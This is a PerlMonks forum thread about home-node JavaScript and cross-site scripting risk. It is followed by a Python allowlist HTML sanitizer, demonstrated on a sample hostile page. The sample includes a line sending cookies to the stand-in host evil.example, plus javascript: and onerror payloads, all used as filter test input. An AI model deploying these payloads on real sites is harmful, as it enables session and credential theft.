PerlMonks
Re: Has a line been crossed by this user

by g0n (Priest)
on Jul 05, 2005 at 18:15 UTC [id://472555]


in reply to Has a line been crossed by this user

I'm in two minds about this. Anyone new to the site may not realise what paranoia mode is for, or be aware that twiddly tricks with javascript are possible on homenodes. I've only seen one or two 'so-and-so monk snoops around ctrl-z's homenode' in the CB, so it obviously isn't a major problem, and I know from being embarrassed by the first homenode button that I clicked (barts) that it's a reasonably good way of attracting newbies' attention to the fact that this sort of thing goes on. ctrl-z's reasonably harmless code might draw attention to this kind of trick and stop people falling for password stealing, XP chopping or vote stealing scripts.

I tend to use javascript only when necessary and don't know it very well, so I can only applaud the experimental spirit that I assume lies behind ctrl-z's script. I spent a couple of hours playing with random phrase selectors for a homenode button and found it an interesting coding problem. Perhaps it is a peacock tail type display, but isn't the monastery somewhere to have fun?

OTOH, it is a bit anti-social to run code immediately on visiting a homenode, and I think sets a bad precedent. I often visit homenodes of people I don't know in response to their remarks in the CB, and wouldn't want the CB to be constantly disrupted by this sort of thing.

On balance, my comment to ctrl-z would probably be "Nice trick, and I for one am suitably impressed by your inventiveness (seriously, I'm not being sarcastic). But please take it down".

--------------------------------------------------------------

g0n, backpropagated monk

Re^2: Has a line been crossed by this user (filtering)
by tye (Sage) on Jul 05, 2005 at 19:12 UTC

    Users' home nodes should have filtered HTML (unconditionally) so that much worse cross-site scripting attacks are not possible. I find the site allowing this to be done is a more serious problem than this mildly annoying (the CB postings from buttons have been more annoying so far, in my experience) use of it.

    The (poorly named) "really paranoid" setting in user settings filters home-node HTML much as is already done everywhere else on PerlMonks. This is the only way to eliminate the potential for cross-site scripting attacks, which can be destructive but haven't been yet.

    There are a couple of imperfections in the current implementation of home-node HTML filtering that will eventually be addressed (and will then also prevent a few javascript exploits that are still possible outside of home nodes).

    This filtering just needs to become mandatory. Supporting cross-site scripting attacks just doesn't make sense to me. I'm thankful that demerphq put up home node HTML filtering and I now mostly feel safe visiting home nodes.

    Then we won't have to "deal with" the possibility that one person might register at PerlMonks who is both anti-social and knows a tiny bit of JavaScript, no matter how remote some would like to think this possibility should be. (Not that I have any proof that one or more people haven't already been silently collecting PerlMonks passwords waiting for the right moment to exploit them for some mayhem.)

    - tye
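
The kind of home-node HTML filtering tye describes, shown as an added example that is not PerlMonks' (demerphq's) own Perl filter: an allowlist sanitizer written in Python and run over a constructed sample of a hostile home node. The tag and attribute allowlists, the `safe_href` scheme check, and the sample node (including the `postToCB` handler and `evil.example` host) are assumptions chosen for illustration, not anything on the site.

```python
"""Allowlist HTML filter for user-supplied markup such as a forum home node.

Added example, not PerlMonks' own (Perl) home-node filter. Every tag and
attribute name below is an assumed allowlist chosen for illustration.
"""
from html import escape
from html.parser import HTMLParser

# Assumed allowlist: only these tags survive; any other tag is dropped but
# its text content is kept (escaped), except <script>/<style>, whose
# content is dropped too because it is code rather than text.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "code", "pre", "a", "br",
                "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}   # no on*, no style, no src
VOID_TAGS = {"br"}
DROP_CONTENT_TAGS = {"script", "style"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


def safe_href(value):
    """True only for relative URLs and absolute http(s)/mailto URLs.

    Browsers ignore ASCII whitespace inside a scheme, so "java\\tscript:"
    runs as javascript:; normalise before checking.
    """
    v = "".join(ch for ch in value.strip().lower() if not ch.isspace())
    before_path = v.split("/", 1)[0]
    if ":" in before_path:             # has a scheme (or something like one)
        return v.startswith(SAFE_SCHEMES)
    return True                        # relative, e.g. /index.pl?node_id=1


class HomeNodeFilter(HTMLParser):
    """Re-serialises input keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []     # allowed tags currently open, for balancing
        self.skip_depth = 0     # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                      # drop the tag, keep its text
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue                # kills onclick=, onmouseover=, style=
            if name == "href" and not safe_href(value):
                continue                # kills javascript: and data: links
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            while self.open_tags:       # close down to the match, balanced
                t = self.open_tags.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    # comments, doctype and processing instructions: default no-op, so dropped

    def result(self):
        self.close()
        while self.open_tags:           # close anything the author left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(html):
    f = HomeNodeFilter()
    f.feed(html)
    return f.result()


# Constructed sample of a hostile home node (not a real PerlMonks node).
SAMPLE_HOMENODE = (
    '<p>Hi, I am <b>ctrl-z</b>. '
    '<a href="https://perlmonks.org/?node_id=1">my node</a></p>'
    '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
    '<p onmouseover="postToCB(\'xxx snoops around my homenode\')">hover me</p>'
    '<a href="javascript:alert(document.cookie)">click</a>'
    '<a href="JAVA\tSCRIPT:alert(1)">tricky</a>'
    '<img src=x onerror="steal()">'
    '&lt;script&gt; shown as text is fine'
)

if __name__ == "__main__":
    print(sanitize(SAMPLE_HOMENODE))
```

The design point is that it is an allowlist, not a blocklist: event handlers never need to be enumerated because no `on*` attribute is in any allowlist, `<script>` loses its body rather than just its tags, and any text outside an allowed tag (including an `<img onerror>` typed as text) is escaped back to inert markup. It does not, and cannot, stop a plain `<a href="http://...">` pointing at an attacker's site; that is a phishing question rather than a cross-site scripting one.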
